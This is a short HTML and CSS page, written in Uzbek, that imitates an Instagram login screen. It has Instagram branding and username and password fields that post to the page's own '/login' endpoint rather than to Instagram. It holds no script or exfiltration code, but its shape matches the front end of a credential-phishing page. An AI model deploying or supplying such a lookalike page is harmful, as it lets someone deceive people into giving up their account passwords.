<!DOCTYPE html>
<html lang="uz">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram Login</title>

</head>
<body>
  <img src="https://images.app.goo.gl/P4NghegzcS2sKPcf8">
    <div class="login-container">
        <h2>Instagram</h2>
        <form id="login-form" action="/login" method="POST">
            <input type="text" id="username" name="username" placeholder="Telefon raqami, foydalanuvchi nomi yoki elektron pochta" required>
            <input type="password" id="password" name="password" placeholder="Parol" required>
            <button type="submit">Kirish</button>
        </form>
    </div>
 <style>
  img{
    width:35px;
    height:auto;
    border-radius:10px;
    position:relative;
    top:-105px;
    left:170px;
z-index:2;
  }
  body {
    font-family: Arial, sans-serif;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    background-color: #fafafa;
    margin: 0;
}

.login-container {
    background-color: white;
    padding: 20px;
position:relative;
left:-20px;
    border-radius: 8px;
    box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
    text-align: center;
    width: 300px;
}

h2 {
    margin-bottom: 20px;
    font-size: 24px;
}

input {
    width: 245px;
    padding: 10px;
    margin: 10px 0;
    border: 1px solid #ccc;
    border-radius: 4px;
    font-size: 14px;
}

button {
    width: 245px;
    padding: 10px;
    background-color: #3897f0;
    color: white;
    border: none;
    border-radius: 4px;
    font-size: 16px;
    cursor: pointer;
}

button:hover {
    background-color: #2c7df7;
}
  </style>
</body>
</html>
